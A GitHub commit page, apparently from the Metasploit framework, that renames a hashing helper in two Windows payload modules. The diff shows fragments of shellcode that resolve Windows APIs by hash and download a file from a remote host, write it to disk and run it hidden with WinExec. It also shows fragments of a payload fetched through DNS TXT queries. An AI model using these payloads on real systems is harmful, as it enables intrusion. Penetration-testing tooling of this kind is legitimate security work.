Skip to content

Commit

Permalink
fix(payloads): fixing typo on block-api hashing function
Browse files Browse the repository at this point in the history
  • Loading branch information
@dledda-r7
dledda-r7 committed Nov 26, 2024
1 parent 523b7fa commit 170fec3
Show file tree
Hide file tree
Showing 2 changed files with 14 additions and 14 deletions.
6 changes: 3 additions & 3 deletions modules/payloads/singles/windows/dns_txt_query_exec.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,7 @@ def generate(_opts = {})
push eax ; flAllocationType MEM_COMMIT (0x1000)
push eax ; dwSize (0x1000)
push 0x0 ; lpAddress
push #{Rex::Text.hash("kernel32.dll", "VirtualAlloc")} ; kernel32.dll!VirtualAlloc
push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAlloc")} ; kernel32.dll!VirtualAlloc
call ebp
push eax ; save pointer on stack, will be used in memcpy
mov #{bufferreg}, eax ; save pointer, to jump to at the end
Expand All @@ -103,7 +103,7 @@ def generate(_opts = {})
push eax ; Push 'dnsapi' to the stack
push 0x61736e64 ; ...
push esp ; Push a pointer to the 'dnsapi' string on the stack.
push #{Rex::Text.hash("kernel32.dll", "LoadLibraryA")} ; kernel32.dll!LoadLibraryA
push #{Rex::Text.block_api_hash("kernel32.dll", "LoadLibraryA")} ; kernel32.dll!LoadLibraryA
call ebp ; LoadLibraryA( "dnsapi" )
;prepare for loop of queries
Expand All @@ -126,7 +126,7 @@ def generate(_opts = {})
push #{queryoptions} ; Options
push #{wType} ; wType
push eax ; lpstrName
push #{Rex::Text.hash("dnsapi.dll", "DnsQuery_A")} ; dnsapi.dll!DnsQuery_A
push #{Rex::Text.block_api_hash("dnsapi.dll", "DnsQuery_A")} ; dnsapi.dll!DnsQuery_A
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
Expand Down
22 changes: 11 additions & 11 deletions modules/payloads/singles/windows/download_exec.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -136,7 +136,7 @@ def generate(_opts = {})
push 0x696e6977 ; ...
mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push #{Rex::Text.hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" )
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
internetopen:
Expand All @@ -146,7 +146,7 @@ def generate(_opts = {})
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent ("wininet\x00")
push #{Rex::Text.hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp.i8 dbl_get_server_host
Expand All @@ -162,7 +162,7 @@ def generate(_opts = {})
push #{port_nr} ; PORT
push ebx ; HOSTNAME
push eax ; HINTERNET hInternet
push #{Rex::Text.hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp.i8 get_server_uri
Expand All @@ -178,7 +178,7 @@ def generate(_opts = {})
push ecx ; url
push edx ; method
push eax ; hConnection
push #{Rex::Text.hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
Expand All @@ -194,7 +194,7 @@ def generate(_opts = {})
push eax ; &dwFlags
push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push #{Rex::Text.hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
httpsendrequest:
Expand All @@ -204,7 +204,7 @@ def generate(_opts = {})
push edi ; dwHeadersLength
push edi ; headers
push esi ; hHttpRequest
push #{Rex::Text.hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz create_file
Expand Down Expand Up @@ -236,7 +236,7 @@ def generate(_opts = {})
push 2 ; dwShareMode
push 2 ; dwDesiredAccess
push edi ; lpFileName
push #{Rex::Text.hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA
call ebp
download_prep:
Expand All @@ -253,7 +253,7 @@ def generate(_opts = {})
push eax ; read length
push ecx ; target buffer on stack
push esi ; hRequest
push #{Rex::Text.hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
Expand All @@ -271,20 +271,20 @@ def generate(_opts = {})
lea eax,[esp+0xc] ; get pointer to buffer
push eax ; lpBuffer
push ebx ; hFile
push #{Rex::Text.hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile
call ebp
sub esp,4 ; set stack back to where it was
jmp.i8 download_more
close_and_run:
push ebx
push #{Rex::Text.hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle
call ebp
execute_file:
push 0 ; don't show
push edi ; lpCmdLine
push #{Rex::Text.hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec
push #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec
call ebp
thats_all_folks:
Expand Down

0 comments on commit 170fec3

Please sign in to comment.